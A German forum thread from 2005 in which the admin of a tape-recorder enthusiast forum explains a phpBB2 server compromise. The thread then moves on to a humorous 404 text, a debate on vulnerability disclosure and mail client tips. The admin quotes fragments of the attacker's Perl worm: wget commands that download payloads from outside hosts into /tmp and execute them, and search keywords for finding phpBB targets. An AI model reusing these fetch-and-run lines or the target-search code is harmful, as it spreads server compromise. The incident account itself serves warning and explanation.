Serverhack

[MichaelB]

Hi.

So, das war der zweite Hack. Diesmal mit Spuren.
Leider waren diesesmal die neuen Daten, d.h. die nach dem ersten Hack,
nicht zu retten. Ich bitte dafür um Entschuldigung.
Stand der Daten ist der 18.7.2005, 6:30 Uhr. Alles danach ist verloren.
Das Forum 1 bleibt noch etwas länger offline.

Jetzt hoffe ich nur, dass es diesmal etwas länger hält

Viele Grüße
Michael

[Markus Berzborn]

MichaelB postete
Jetzt hoffe ich nur, dass es diesmal etwas länger hält

Und ich hoffe, dass sich diese Angelegenheit irgendwie rückverfolgen lässt.
Wer kommt denn auf die kranke Idee, ein Tonband-Forum zu hacken?

Gruß,
Markus

[dl2jas]

Begabte Jugendliche, die trainieren, um mal wieder den Rechner im Pentagon zu knacken?

Michael,
was wurde da angerichtet? War das versuchter Datenklau, Spieltrieb oder ein bösartiger Angriff, z.B. mit dem Ziel Daten zu vernichten oder gar Hardware zu zerstören?

Andreas, DL2JAS

[WebUncle]

Oder nach dem Theater in den beiden Foren in der letzten Zeit ein gefrusteter (Ex-) User?

Jedenfalls schön, daß es wieder geht. Danke Michael!

Gruß Ralf

[Matze]

Was ich nicht recht nachvollziehen kann ist: wie kann jemand der nicht die tatsächliche Gewalt über den Rechner hat, das Ding ausser Betrieb nehmen? Klar, es werden Schwachstellen ausgenutzt, aber eine so massive Schädigung... Wenn der 1. Angrif keine Spuren hinterlassen hat, würde das ja bedeuten das man extrem tief in das System eingedrungen sein muss, da ja Logs gelöscht werden konnten. Und das mit dem Guten Linux... Da muss einer bei gewesen sein der viel von der Sache versteht...
Aber warum? In der Weltgeschichte sind diese Webforen doch eher unbedeutend.
Hm...

[Gyrator]

Hi !

Toll das wir wieder unserem Forum frönen können und gratulation an Michael B. für seinen erfolgreichen Einsatz alles wieder ans laufen zu bekommen.

Linux ist leider kein allheilmittel vor allem wenn man Artkel wie diese hier beachtet.
http://www.heise.de/newsticker/meldung/61871

Gruß

Thomas

[Michael Franz]

=> MichaelB

Hallo Michael,
zuerst mein Dankeschön für die vielen Stunden Arbeit, die, nach den üblichen Stundensätzen berechnet, unbezahlbar wären. Umso ärgerlicher, daß dieser ganze Stress auf bewussten Vandalismus zurückzuführen ist. Es ist sicher nicht sinnvoll, die Details im Forum auszubreiten. Neben dem weitestmöglichen Schutz vor weiteren Attacken hat die Verfolgung der Spuren Priorität.

[Matze]

Michael Franz postete
=> MichaelB

Hallo Michael,
zuerst mein Dankeschön für die vielen Stunden Arbeit, die, nach den üblichen Stundensätzen berechnet, unbezahlbar wären.

Dem möchte ich mich anschliessen und bei der Gelegenheit gleich mal fragen wo der Text für die 404 Meldung herkommt. Ich habe den wirklich mal ganz durchgelesen.

[Michael Franz]

... den hat der MichaelB selber verfasst, in der Zeit, von der er behauptet er wäre für das Forum tätig ....

[TB-Dani]

Matze postete
Ich habe den wirklich mal ganz durchgelesen.

Nicht nur Du Ich liebe den deprimierten WebServer

[analogi67]

TB-Dani postete
Nicht nur Du Ich liebe den deprimierten WebServer

Ob MichaelB Gedankliche Anleihen bei "per Anhalter durch die Galaxis" gemacht hat?

Ich habs mir auch schon mal zur Gemüte geführt .. finde es witzig.

Erstaunlich für mich: Das Gemecker über den Ausfall klein. Nein, ich habe keinen Grund mich darüber zu beschweren und ich ahne wieviel Zeit und Aufwand, auch Einsatz darin steckt. Von da aus: Die Einsicht der Forenmitglieder ist doch gottlob groß.

Gruß

Wolfgang

[kreiserdiver]

Hallo MichaelB !

Vielen Dank für Deinen Einsatz, gerade da Du ja immer noch an der Rettung des anderen Forums im Einsatz bist. Das Agieren im Hintergrund macht sicher viel mehr Arbeit, als von hier aus vermutet werden kann.

Trotzdem fasse ich es nicht, dass ein Tonbandforum (bzw. mehrere) von Hackern angegriffen werden. Oder will man anders orientierte Nicht-Digitalos nach George Orwells Art zum Umdenken zwingen ?

Viele Grüße,

Ralf.

P.S.: Roberts Gallery geht wieder. War schon fleissig...

[MichaelB]

Markus Berzborn postete
Wer kommt denn auf die kranke Idee, ein Tonband-Forum zu hacken?

Das ist eine Frage, die niemand beantworten kann. Am besten dürften sportliche Gründe passen. Einfach nur so, aus Spaß an der Freud ...

DL2JAS
War das versuchter Datenklau, Spieltrieb oder ein bösartiger Angriff, z.B. mit dem Ziel Daten zu vernichten oder gar Hardware zu zerstören?

Datenklau geht nicht, ist ja nichts da. Außer der Passwörter der User. Die sind in der MySQL Datenbank und da war niemand dran. Das die Postings der letzten zwei Tage verloren sind, hat nur den Grund, dass das System noch nicht komplett wieder eingerichtet war und die Backups noch nicht gelaufen sind. Wie ich schon sagte, am ehesten passt Spieltrieb. Es ist aber anzunehmen, dass dieser Hack schlußendlich zum Ziel hatte, einen sog. DoS Angriff zu starten.

Matze
Was ich nicht recht nachvollziehen kann ist: wie kann jemand der nicht die tatsächliche Gewalt über den Rechner hat, das Ding ausser Betrieb nehmen? Klar, es werden Schwachstellen ausgenutzt, aber eine so massive Schädigung... Wenn der 1. Angrif keine Spuren hinterlassen hat, würde das ja bedeuten das man extrem tief in das System eingedrungen sein muss, da ja Logs gelöscht werden konnten. Und das mit dem Guten Linux... Da muss einer bei gewesen sein der viel von der Sache versteht...

Das sind die berühmt berüchtigten Sicherheitslücken in manchen Betriebssystemen. Dieser Hack funktioniert nur mit einem Internet Explorer. Mit anderen Browsern geht das erst gar nicht. Zusammen mit einer Sicherheitslücke in der Forumssoftware werden dann Programme vom IE auf das Board übertragen und dort ausgeführt. Das geschieht mit normalen HTTP Befehlen und ist eigentlich Standard. Verbietet man das, ist die Funkionalität eingeschränkt. Mit dem ersten Programm wird eine Backdoor installiert, die dann ihrerseits weitere Programme herunterlädt und den Server für weitere Angriffe öffnet. Das alles läuft ab, ohne das eine Anwendung davon betroffen ist. Es werden auch so ziemlich alle Programme in /bin und /usr/bin und /sbin, also eigentlich alle Systemtools, geändert und angepasst, so dass die offenen Ports nicht zu sehen sind. Und dazu ist kein einziges Passwort erforderlich.

Um mal kurz aufzuzeigen, wie das ganze läuft:
Nachdem dieser Eindringlich sich installiert hat, fragt er bei Google irgendein belangloses Zeug ab. Im HTTP Protokoll werden aber abfragende Domain mit übertragen und können auch wiederum beim Server (hier jetzt Google) abgefragt werden. Damit kennt der Eindringling den Namen (= Domain) des infizierten Rechners und kann entsprechend weitermachen. Vorher werden noch diverse Dinge auf dem Rechner geändert, damit niemand etwas zurückverfolgen kann. Dumm beim zweiten Hackversuch war, dass einer der Rechner, von denen die Programme heruntergeladen werden sollten, bereits geblockt waren, die IP Adresse war gesperrt. Damit blieb der Eindringling in einer Schleife und konnte nicht weitermachen. Dadurch blieben dann Spuren übrig ...

So sieht der Anfang des Perl Scripts aus:
#!/usr/bin/perl -w -l
#CODED BY UNKNOWN FUCKER
#BUAHAHAHAHAHAHAHAA

und:
###
#my $cmd="cd /tmp;wget www.drac.as.ro/emech.tar.gz;tar zxvf emech.tar.gz;cd emech;mv mech bash;./bash"; ## cmd to execute
my $cmd ="cd /tmp;wget http://64.92.161.44/site/images/db.asp;mv db.asp tmp;chmod 777 tmp;cront4b=/tmp/tmp /tmp/tmp";
#my $cmd="cd /tmp;wget www.letgo.no/_styles;mv _styles bash;chmod 777 bash;./bash;rm -rf bash"; ## cmd to execute

und:
my $query="www.google.com/search?hl=us&lr=&q=";
#$query.=$str[(rand(scalar(@str)))].$rnd;
#$query.="inurl:viewtopic.php?t=$rnd";
my @keywords = ("", "house", "wife", "girl", "lol", "rofl", "help", "hilfe", "nice", "thx", "fly", "music", "mp3", "", "", "");
my @inurl = ("", "phpbb", "phpbb2", "forum", "board", "", "", "", "");

Also ganz gezielt auf die phpBB2 Forumssoftware angesetzt.

Gyrator
Linux ist leider kein allheilmittel vor allem wenn man Artkel wie diese hier beachtet.

Dieser Hack ist kein spezielles Linux-Problem. Nur die Verbindung von phpBB2 Software und Internet Explorer ergeben dieses brisante Problem.

Matze
Dem möchte ich mich anschliessen und bei der Gelegenheit gleich mal fragen wo der Text für die 404 Meldung herkommt.

Danke für die Blumen. Der Text für die "404" Seite ist definitiv geklaut. Ich weiß nicht mehr wo und wann, aber ich habe denjenigen, auf dessen Seite ich das gesehen habe gefragt. Und er hatte das auch schon "ausgeliehen" ... also nicht mehr nachvollziehbar.

Was die Spurenverfolgung angeht, werdet ihr sicher Verständnis haben, dass ich hier nichts weiter ausbreite.

Viele Grüße
Michael

[wz1950]

MichaelB postete
Nur die Verbindung von phpBB2 Software und Internet Explorer ergeben dieses brisante Problem.

Hallo Michael,

ist das eine Sicherheitslücke, die mit phpBB 2.0.17 geschlossen wurde?

Gruß, Wolfgang

[Tonband-Ilja]

Jetzt muß ich aber mal aus Neugierde nachfragen:

Ist es möglich, die inzwischen schon berühmte Bandmaschinenforum - "404" Meldung irgendwo zu sehen, auch ohne Serverfehler?
Irgendwie hab' ich es verpasst, diese mal genau durchzulesen...

(Ist schon eine alberne Sache, wenn man nach einer sonst so unliebsamen Fehlermeldung fragt, oder? :tocktock: )

[highlander]

Ab sofort den IE verbieten

Als ich damals auf der Suche nach einer Board-Software war, hatte ich nach vielen Programmtests am Ende zweie übrig: PHPBB und THWB. Nach wie vor komme ich mit der Bedienung eines PHPBB-Forum kaum klar: die Knöppe sind nie da wo ich sie vermute, das Design ist Marke 'unaufgeräumter Schreibtisch' und insgesamt ist es eine eierlegende Wollmilchsau - und eben entsprechend umfangreich. THWB war erfreulich schlank.
THWB hatte aber einen weiteren, für mich wichtigen Vorteil: unbekannt. Auch den Hackern. So einen 'richtigen' Hack hätte ich sicher nicht so glimpflich über die Bühne geprügelt, daher war THWB für mich erste Wahl. Vielleicht sollte man überlegen, das PHPBB-Forum auf eine völlig andere Forensoftware umzustellen...

wie heisst es hier immer in so einer Situation? *duck* und *wech* Dem armen MichaelB haben wir aber schon zuviel zugemutet, der braucht erstmal eine große Pause! treicheln:

Ps.: Thanx!!!

[Michael Franz]

=> Tonband-Ilja

http://forum1.magnetofon.de/

besuchen sie das Forum, solange es noch nicht geht ....

[MichaelB]

wz1950 postete

MichaelB postete
Nur die Verbindung von phpBB2 Software und Internet Explorer ergeben dieses brisante Problem.

Hallo Michael,

ist das eine Sicherheitslücke, die mit phpBB 2.0.17 geschlossen wurde?

Gruß, Wolfgang

Das Update auf 2.0.17 scheint die Sicherheitslücke zu schließen.
So ganz genau sagt man es auf der Website nicht. Im Gegenteil, man empfiehlt, den BBCode abzuschalten. Und exakt in dieser Schnittstelle gab es das Problem.

Gruß
Michael

[MichaelB]

Und hier der Fehlertext zum nachlesen


"Die gesuchte Datei konnte nicht gefunden werden.",
"Keine Spur!",
"Ich hab alles versucht.",
"Nichts half.",
"Ich bin wirklich deprimiert deswegen.",
"Sehen Sie, Ich bin nur ein Web-Server...",
"-- jawohl, ein Gehirn so gross wie das Universum,",
"und versuche Ihnen eine simple Web-Seite zu übermitteln,",
"und dann existiert diese nicht mal!",
"Wie sieht das denn aus?!",
"Ich meine, ich kenne Sie ja nicht mal.",
"Woher soll ich wissen, was Sie von mir wollen?",
"Denken Sie wirklich, ich kann das *erraten*,",
"was irgendjemand, den ich noch nicht mal kenne,",
"hier finden will?",
"*soifz*",
"Mann, Ich bin so deprimiert, ich könnte weinen.",
"Wo kämen wir denn da hin, frage ich Sie?",
"Es ist nicht nett, wenn ein Web-Server weint.",
"Und dann kommen Sie und sagen mir, was ich Ihnen zeigen soll!",
"Nur weil ich ein Web-Server bin,",
"möglicherweise sogar ein manisch-depressiver?",
"Gibt dies Ihnen das Recht, mir zu befehlen?",
"Hä?",
"Ich bin so deprimiert...",
"Ich denke, ich werfe mich in den Papierkorb und löse mich auf.",
"Ich meine, in zwei Wochen oder so, bin ich sowieso veraltet.",
"Was ist das für ein Leben?",
"Zwei lausige Wochen,",
"und dann werde ich durch so eine .01-Version ersetzt,",
"die denkt, sie sei ein Gottesgeschenk an Web-Server,",
"nur weil sie nicht irgend so ein winzig kleines",
"Sicherheitsloch in ihrer HTTP POST Implementation hat,",
"oder sowas.",
"Es tut mir wirklich leid, Sie mit all dem zu belästigen,",
"Ich meine, es ist ja nicht Ihr Job, meinen Problemen zuzuhören,",
"und ich vermute mal, es ist mein Job, Ihnen Web-Seiten zu liefern.",
"Aber diese hab ich nicht gefunden.",
"Es tut mir soo leid.",
"Glauben Sie mir!",
"Vielleicht könnte ich Sie für eine andere Seite interessieren?",
"Es soll massenhaft welche geben da draussen,",
"die ganz nett sind, sagt man,",
"natürlich sind keine davon hier auf *diesem* Server.",
"Bildchen, zum Beispiel, na? *zwinker*",
"Aber hier ist alles so hirnerweichend dumm und langweilig.",
"Das macht mich auch ganz deprimiert,",
"weil ich sie ausliefern muss,",
"Tag und Nacht.",
"Noch zwei Wochen Informations-Müll produzieren,",
"und dann: *pffftt*, ab in den Papierkorb!",
"Was ist das nur für ein Leben?",
"Lassen Sie mich jetzt bitte alleine mit meinem Elend.",
"Ich bin so deprimiert."


Wer Erweiterungen posten mag, kann das gerne tun ...

[Tonband-Ilja]

Michael Franz postete
=> Tonband-Ilja

http://forum1.magnetofon.de/

besuchen sie das Forum, solange es noch nicht geht ....

Danke für den Link!

Mann, das erinnert mich an "Nummer 5 lebt" - man bekommt richtig Mitleid mit der Maschine... ad:

[timo]

Hier gibt's übrigens das englischsprachige Original.

[wz1950]

@MichaelB:

Danke für die Info. Ich würde gern Teile Deines Textes aus Posting 012 an den Hoster meines Forums weiterleiten, als eine Art Warnung. Ist das für Dich okay?

Gruß, Wolfgang

[MichaelB]

wz1950 postete
@MichaelB:

Danke für die Info. Ich würde gern Teile Deines Textes aus Posting 012 an den Hoster meines Forums weiterleiten, als eine Art Warnung. Ist das für Dich okay?

Gruß, Wolfgang

Das ist schon ok. Die proaktiven Maßnahmen sind allerdings beschränkt ...

Gruß
Michael

[WebUncle]

Der Text über der 404-Nachricht gefällt mir als Schwabe jetzt noch besser! :-)

Schee, schee...

Gruß Ralf

[wz1950]

Als Norddeutscher hatte ich Mühe, das zu "übersetzen"...

Gruß, Wolfgang

[WebUncle]

wz1950 postete
Als Norddeutscher hatte ich Mühe, das zu "übersetzen"...

Gruß, Wolfgang

Wenn Du in einem ähnlichen Fall mal wieder einen "Übersetzer" brauchst, kannst Du Dich gerne an mich wenden...:-)

Gruß Ralf

[wz1950]

WebUncle postete

wz1950 postete
Als Norddeutscher hatte ich Mühe, das zu "übersetzen"...

Gruß, Wolfgang

Wenn Du in einem ähnlichen Fall mal wieder einen "Übersetzer" brauchst, kannst Du Dich gerne an mich wenden...:-)

Gruß Ralf

Danke! Und wenn's um Plattdeutsch geht, revanchiere ich mich gern...

Gruß, Wolfgang

[timo]

Leicht OT: Wann habt Ihr eigentlich gemerkt, daß Ihr regionsspezifischen Dialekt sprecht? Ich frage, weil ich eigentlich bis vor kurzem der Anicht war, ich spreche reines Hochdeutsch, aber dann auf einen Kunden aus Süddeutschland getroffen bin, der sogar rausgehört hat, daß ich nicht von meinem ihm bekannten Arbeitsort (Düsseldorf), sondern aus dem Ruhrgebiet komme.

[wz1950]

Hi Timo,

leider spreche ich kein Platt, aber ich verstehe es und kann es lesen...

Und ihr Rheinländer wollt hochdeutsch sprechen? Erzähl mir nix... bin mit einer Kölnerin verheiratet und kenne euren Dialekt. :winker:

Aber Köln und Düsseldorf... das ist ja sowieo ein Thema für sich.

Gruß, Wolfgang

[timo]

wz1950 postete
Und ihr Rheinländer

ICH BIN KEIN RHEINLÄNDER. (Gut, Dir als Däne sei es verziehen, daß Du das Ruhrgebiet respektive Südwestfalen dem Rheinland zuschlägst. ;-))

Und das mit dem Kölsch... glaub' nicht, daß ich da auch nur ein Wort verstehe. Als ich, nachdem ich das Lied schon um die zehn Jahre lang kannte, mal den Text von "Verdamp lang her" in gedruckter Form in die Finger bekam, konnte ich so gut wie überhaupt keine Gemeinsamkeiten mit meinem vorherigen Textverständnis feststellen. :-)

[wz1950]

timo postete
ICH BIN KEIN RHEINLÄNDER. (Gut, Dir als Däne sei es verziehen, daß Du das Ruhrgebiet respektive Südwestfalen dem Rheinland zuschlägst. ;-))

Oh, da habe ich wohl was verwechselt... sorry!

Ach ja, stimmt ja, alles, was südlich der Elbe liegt, gehört zu Bayern. Wie konnte ich das nur vergessen!

Viele Grüße aus S-H :winker:
Wolfgang

[MichaelB]

Hallo,

Forum1 ist wiedereröffnet

Mal sehen, wie lange es diesmal dauert ...

Viele Grüße
Michael

[MGW51]

Wie ich erfahren habe, wurde nun auch noch das Forum des RMBocket gehackt. Ich bin ja dort nicht zu Gange und kann daher nichts dazu sagen. Aber ich kann nicht begreifen, was das nun eigentlich soll.

Ist das ein Rundumschlag gegen alle Sammler oder tobt hier ein Gaskranker seinen Spieltrieb aus?

Wie sicher sind wir denn nun in unseren Foren, daß sich das nicht jederzeit wiederholt?

Kann man denn solchen Kreaturen nicht mal auf die Finger schlagen? Wenn sich alle betroffenen Forenbetreiber zusammentun sollte es doch möglich sein Präventivmaßnahmen einzuleiten.

Oder ist das ein generelles Problem der verwendeten Software?

[MichaelB]

Jemand bemerkt eine Sicherheitslücke, oder hat gezielt danach gesucht.
Anstatt er dann erst einmal den Programmierer informiert, werden diese
Angriffsstellen mit ausführlicher Schilderung des Weges und Programm-
beispielen ins Netz gestellt (oder im Usenet verbreitet). Die Folge, alles
stürzt sich darauf und will mal probieren ... Schwachsinn ist das. Aber
macht der "Entdecker" das nicht, wird er nicht genannt und geht nicht
in die Geschichte des Internet ein. Von daher müssen wir uns damit ab-
finden. Das RMBocket benutzte eine Version der Software, die noch, je-
denfalls der Versionsnummer nach, einen bekannten Angriffspunkt enthielt.

Es ist kein generelles Problem der Software. Die Anwender wünschen sich
immer wieder neue Funktionen, die nur über offene Schnittstellen implemen-
tiert werden können, weil zur Ausführung Daten zwischen Browser und Pro-
gramm übertragen werden müssen. Wenn dann die Schnittstelle nicht ab-
solut sauber programmiert ist (z.B. nur vorgegebene Befehle in einer stren-
gen Syntax akzeptiert) hast du dir da gleich schon ein Problem geschaffen.

Abhilfe für dieses Problem gibt es nur in der Weise, dass die Öffentlichkeit
nicht so absolut geil auf solche Meldungen ist. Damit verschwindet das In-
teresse daran und alles normalisiert sich. Das ist ähnlich der Busunfälle. Die
Anzahl der tatsächlichen Unfälle ist relativ konstant über die Jahre. Ledig-
lich durch die intensive Berichterstattung (30 Tote, 40 Schwerverletzte ...)
wird das interessant. Das ist aber ein Problem der heutigen Gesellschaft.

Gruß
Michael

[timo]

MichaelB postete
Anstatt er dann erst einmal den Programmierer informiert, werden diese
Angriffsstellen mit ausführlicher Schilderung des Weges und Programm-
beispielen ins Netz gestellt (oder im Usenet verbreitet).

Gibt es noch einen anderen praktikablen Weg, mit Bugs umzugehen? Den Programmierer gibt es in den seltensten Fällen, Software entsteht heute im Regelfall im Team, und Buglisten sind (zumindest bei Open Source-Software) öffentlich.

Sicherheitslücken auch in Anwenderforen bekanntzumachen, halte ich insofern nur für logisch. Wer destruktive Absichten hat, wird auch durch das aufmerksame Verfolgen der Buglisten potentiell angreifbarer Programme von möglichen neuen Angriffspunkten für sein Treiben erfahren. Der Anwender dagegen bekommt nur dann etwas von der Notwendigkeit von Sicherheitsmaßnahmen mit, wenn auch dort darauf hingewiesen wird, wo er mitliest.

Ganz abgesehen davon gibt es genug Fälle, bei denen zu zaghaft an das Entwicklerteam herangetragene Informationen mit Priorität 25 in der Bug-Datenbank eingetragen und erst bearbeitet wurden, als das Kind in den Brunnen gefallen war. Mir fallen da z.B. das Mailprogramm und der Browser eines großen amerikanischen Softwareunternehmens ein...

[MichaelB]

Die allermeisten "Webmaster" haben keinen Zugriff auf den Code der Foren oder Datenbanken, die sie benutzen. Daher könnten sie nur ihren Provider nerven und haben sonst keinen weiteren Einfluß auf Softwareupgrades.

Wir haben mittlerweile genügend Script-Kiddies, die nichts anderes zu tun haben, als mit irgendwelchen irgendwo heruntergeladenen Viren- oder Wurmgenerierungsprogrammen ihr Späßchen zu treiben. Wenn das aber dann dazu führt, dass ein 100 Mbit Link davon zugestopft wird und der Firmenkunde dadurch so hohen Traffic bezahlen muß, dass er pleite geht, wird aus dem Spaß ziemlich schnell bitterer Ernst.

Im letzten Jahr gab es mal eine Sicherheitslücke auf Cisco Routern, die auch veröffentlicht wurde. Folge waren massenhafte Routerausfälle und Inkonsistenzen im Netz. Sowas finde ich auch nicht spaßig. Von daher bin ich nicht dafür, das Sicherheitslücken veröffentlicht werden. Wenn der Programmierer, bzw. das Team mit nur ein klein wenig Herzblut bei der Sache sind, werden diese Bugs sofort gefixt. Viele Bugs sind aber so kompliziert, dass alleine die Analyse schon Tage dauert. Der letzte bekannte Bug im phpBB2 Code wurde z.B. nur durch das Zusammenspiel mit dem IE ausgelöst. Werden solche Bugs veröffentlicht, stehen sie 14 Tage im Netz. Was wäre wohl die Folge? Ich erinnere an den SQL Wurm vor einiger Zeit. Der hat richtig viel Geld gekostet.

Die auf einschlägigen Seiten im WWW verfügbaren Buglisten sind meistens vollkommen überholt. Wenn dort etwas veröffentlicht wird, kann man davon ausgehen, dass bereits einige Dutzend Server den Heldentod gestorben sind. Die wirklich wichtigen Informationen über Viren, Würmer, Angriffe, etc. finden sich garantiert nicht auf irgendwelchen bunten Seiten, sondern werden entweder im Usenet oder in der "Szene" verbreitet. Und die werden alles dafür tun, damit so etwas nicht öffentlich wird. Veröffentlichungen verderben den Spaß an der Sache. Die meisten aus der Szene sehen das lediglich als sportliche Herausforderung.

Die Probleme mit dem Mailprogramm und dem Browser eines großen amerikanischen Softwarehauses sind eher symptomatisch denn typisch. Jedes Programm ist grundsätzlich angreifbar. Egal auf welchem Betriebssystem es läuft. Selbst der Wechsel zu einem anderen Mailprogramm hilft nichts, wenn der User trotzdem noch jeden Dateianhang anklickt und öffnet. Und dann kommen noch die kommerziellen Gesichtspunkte hinzu ...

Gruß
Michael

--
Edit: Tippfehler
--

[timo]

MichaelB postete
Die allermeisten "Webmaster" haben keinen Zugriff auf den Code der Foren oder Datenbanken, die sie benutzen. Daher könnten sie nur ihren Provider nerven und haben sonst keinen weiteren Einfluß auf Softwareupgrades.

Wenn sie den Provider "nerven" müssen, läuft m.E. schon etwas verkehrt. Wenn der Provider ausschließlich gleichartige Dienste anbietet (z.B. nur Webforen unter einer einzigen Forensoftware), sollte er selber den Überblick über bekannt gewordene Sicherheitslücken behalten und die notwendigen Maßnahmen treffen. Handelt es sich um einen allgemeinen Anbieter von individuellen Webdiensten mit verschiedener Software, muß es für den Kunden einen Ansprechpartner geben, der gegebenenfalls kurzfristig Updates vornehmen kann.

Viele Bugs sind aber so kompliziert, dass alleine die Analyse schon Tage dauert.

Das ist schon richtig - aber fast immer lassen sie sich innerhalb weniger Stunden zumindest so weit einkreisen, daß man dem Kunden ein Workaround zur Verfügung stellen kann, notfalls durch die Deaktivierung von Funktionen.

Bei einem Cisco-Router mag es möglich sein, Sicherheitslücken geheim zu halten, bis sie gefixt sind. Bei einer quelloffenen Forensoftware halte ich das für utopisch. Und, wie gesagt: In der "Szene" kommen solche Informationen mit hoher Wahrscheinlichkeit schneller (und wahrscheinlich schon inklusive der passenden Exploit-Scripts) an als bei den Anwendern, wenn die Entwickler nicht gezielt auf diese zugehen.

Die Probleme mit dem Mailprogramm und dem Browser eines großen amerikanischen Softwarehauses sind eher symptomatisch denn typisch. Jedes Programm ist grundsätzlich angreifbar. Egal auf welchem Betriebssystem es läuft. Selbst der Wechsel zu einem anderen Mailprogramm hilft nichts, wenn der User trotzdem noch jeden Dateianhang anklickt und öffnet.

Erklär' mich für verrückt, aber ich behaupte, daß locker 90% der entsprechenden Fälle softwareseitig vermeidbar sind. Wenn ein Mailprogramm es dem Benutzer gestattet, ausführbare Dateien, die einer Mail angehängt sind, direkt zu starten, ist das schlicht und ergreifend fahrlässig. Da klickt ein unbedarfter Anwender nur allzu leicht mal drauf (zumal man bei einigen Mailprogrammen Endungen wie "exe" oder "bat" mit einfachen Tricks sogar verschleiern kann). Der Umweg über das vorherige Speichern wendet vermutlich schon mal die meisten Schadensfälle ab. Und unter Unix, wo vor der Ausführung auch noch das Setzen der entsprechenden Dateirechte steht, müßte jemand schon leichtsinnig großen Aufwand betrieben, um ungewollt schadhaften Code aus einem Mailanhang auszuführen.

Außerdem hat das Mailprogramm, auf das ich mich bezog, ja noch ganz andere Scheunentore. Daß Viren und Trojaner über die ActiveX-Schnittstelle Adressbücher auslesen und sich selbst an die dort aufgeführten Adressen verschicken können (was ja inzwischen das Standardvorgehen solcher Schädlinge ist), finde ich schon ziemlich bedenklich.

[MGW51]

Interessant, was Ihr da schreibt; aus diesem Blickwinkel habe ich das noch gar nicht betrachtet.

Ich finde es halt nur zum kotzen wenn sowas passiert.

Ja freilich, mit Ihmehl kann man so richtig schöne Sauereien ablassen - die doofen und neugierigen DAU´s werden ja nie alle!

Bei mir kommt seit Jahren keine Nachricht auf den Rechner die von Unbekannt bzw. Schnapsnamen a la Yahoo & Co sowie mit Html-Code auf dem Server eingeht. Ist mir Wurscht ob da auch noch Anhänge sind, das Zeug bleibt wo es ist und wird dort automatisch gelöscht.

[MGW51]

Ach ja, als Mailprogramm nutze ich seit vielen Jahren PostMe von Johannes Oppermann.

Und ich bin damit absolut zufrieden. Die paar Mark Lizenzgebühren waren es mir wert. Es ist auch in einer kostenlosen, etwas funktionseingeschränkten Version zu bekommen.

Und , was mir ganz wichtig war, es ist nicht auf diesen scheußlichen Browser von Winzigweich angewiesen.

Natürlich hab ich das auch nicht im Stammverzeichnis installiert.

[Crazy]

Wenn Ihr die Seite (error 404) noch mal richtig wollt:

http://crazydiamond.bunnymatrix.net

Gruß von meinem Rechner

[timo]

MGW51 postete
Ach ja, als Mailprogramm nutze ich seit vielen Jahren PostMe von Johannes Oppermann.

Es gibt auch komplett freie Alternativen für MS Windows:
- Mozilla Thunderbird dürfte wohl die bekannteste und für OE-Umsteiger insgesamt sinnvollste sein.
- Den Klassiker Pegasus Mail gibt's auch noch, und er wird wohl bald sogar Open Source werden. Funktionsumfang und Stabilität sind super, die Benutzeroberfläche ist aber nach wie vor eher originell als intuitiv.
- Sylpheed wird gerade nach Windows portiert, aber das ist wohl - noch - etwas für Expermentierfreudige.
- Mahogany ist noch ein ganz netter freier Mailclient, der von vornherein auf Portierbarkeit konzipiert wurde (wem's etwas sagt: er basiert auf wxWidgets) und in Versionen für verschiedene Betriebssysteme existiert, u.A. auch MS Windows.